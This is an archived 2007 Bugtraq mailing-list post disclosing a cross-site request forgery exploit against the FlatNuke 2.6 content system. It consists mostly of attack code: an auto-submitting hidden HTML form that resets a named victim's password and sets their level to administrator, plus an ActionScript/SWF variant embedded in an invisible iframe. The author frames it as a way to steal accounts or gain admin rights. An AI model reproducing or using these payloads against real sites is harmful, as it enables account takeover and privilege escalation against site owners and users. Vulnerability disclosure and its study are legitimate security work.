lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 24 Sep 2007 18:12:36 -0000
From: darkbunny91@...il.com
To: bugtraq@...urityfocus.com
Subject: Arbitrary Command Inclusion

/* hackflatnuke.txt
 *
 * Tested on 2.6 FlatNuke version (can work on 3 but it has to be modified)
 *
 * With this trick you can steal/modifie a flatnuke account by changing the password and all the profile or change your profile and become an admin
 *
 * Requirements: - You have to know the nickname of the account u want to steal or change             
 *    
 */
 

HTML version  modifiable	
	
	
	<!-- flatnuke.html-->
	<html>
	<body>
	<title>Hack FlatNuke</title>
		<form method="POST" action="http://www.site.com/path_flatnuke/index.php?mod=none_Login">
			<input type="hidden" name="action" value="saveprofile">
			<input type="hidden" name="user" value="VICTIM">
			<input type="hidden" name="regpass" value="NEW_PASS">
			<input type="hidden" name="anag" value="NAME">
			<input type="hidden" name="homep" value="VICTIM_SITE">
			<input type="hidden" name="prof" value="PROFESSION">
			<input type="hidden" name="prov" value="ORIGIN">
			<input type="hidden" name="ava" value="blank.png">
			<input type="hidden" name="url_avatar" value="">
			<input type="hidden" name="firma" value="VICTIM">
			<input type="hidden" name="level" value="LEVEL from 1 to 10 P.S. 10=administrator">
		</form>
	<script> document.body.onload = document.forms[0].submit(); </script>	
	</body>
	</html>
	<!-- Byez -->
	
	

Flash versione that you have to export in a swf and import in a iframe

exploit.swf


    var action:String = "saveprofile";
    var user:String = "nome_user_che_modifichiamo";
    var regpass:String = "nuova_pass";
    var anag:String = "nome";
    var homep:String = "sito_utente";
    var prof:String = "professione";
    var prov:String = "provenienza";
    var ava:String = "blank.png";
    var url_avatar:String = "";
    var firma:String = "firma_utente";
    var level:String = "livello da 1 a 10 N.B 10=amministartore";
    getURL("http://www.sito.com/path_flatnuke/index.php?mod=none_Login", "_self", "POST");

    
hackflatnuke.html


    <html>
    <head>
    <title>Title</title>
    </head>
    <body bgcolor="000000">
    <center>
    <font face="Verdana" size="5" color="#FF0000">
    Hack FlatNuke
    </font>
    <br/>
    <br/>
    <iframe src="exploit.swf" frameborder="0" height="0" width="0"></iframe>
    </center>
    </body>
    </html>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ